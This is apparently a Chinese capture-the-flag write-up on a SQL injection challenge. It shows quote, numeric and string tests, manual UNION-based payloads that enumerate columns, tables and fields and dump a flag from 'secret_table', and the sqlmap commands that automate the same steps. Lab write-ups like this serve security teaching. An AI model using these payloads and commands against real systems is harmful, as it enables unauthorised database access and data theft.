本文详细介绍了如何检测和利用SQL注入漏洞,通过单引号判断法、数字型和字符型注入测试,展示了手工注入和使用sqlmap工具的过程。内容包括寻找突破口、判断注入点、爆库、表名、字段以及获取敏感信息。最后,给出了使用sqlmap进行自动化注入的命令示例。
一、分析
进入页面,看见了一个网站,看看源代码,网页内容,寻找突破口,可以用御剑进行目录扫描寻找突破口,进行测试发现没有突破口,尝试尝试sql注入。
二、步骤
1.测试是否存在sql注入
如何判断sql注入点
1单引号判断法
搜索框或URL尾端加 ’ 如果报错则可能存在sql注入漏洞,因为字符型or整型都会因为单引号个数不匹配而报错
2,数字型判断是否有注入
and 1=1 返回正确页面
and 1=2 返回错误页面
3,字符型判断是否有注入
‘ and ‘1’='1 返回正确页面
’ and '1'='2 返回错误页面
单引号判断,可以在搜索框中输入',也可以在url末尾添加注意这里要以post提交,why?查看初始页面源代码可以发现
已经知道存在sql注入,可以运用工具sqlmap。也可以手工注入
手工注入:
1,构造payload:1' order by 3#,之前为1,2,3页面回显正常,当为4的时候页面报错,说明有三列数据
2.构造payload:1' union select 1,2,3# 爆出注入在哪两列数据
3.注入点在2,3.构造payload:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 爆出表名
4.构造payload:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='secret_table'# 爆字段
5.构造payload:' union select 1,2,group_concat(id,0x3a,fl4g) from secret_table# 爆flag
flag:QCTF{sq1_inJec7ion_ezzz}
sqlmap:
bp抓包保存为1.txt,放到kali root目录下
执行命令:sqlmap -r "1.txt" 爆出信息
爆出库名,和用户名:sqlmap -r "1.txt" --current-db --current-user
爆出表名:sqlmap -r "1.txt" --tables -D "news"
爆字段:sqlmap -r "1.txt" --columns -D "news" -T "secret_table"
爆flag:sqlmap -r 1.txt -D "news" -T "secret_table" -C "fl4g" --dump
扫一扫
1945
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
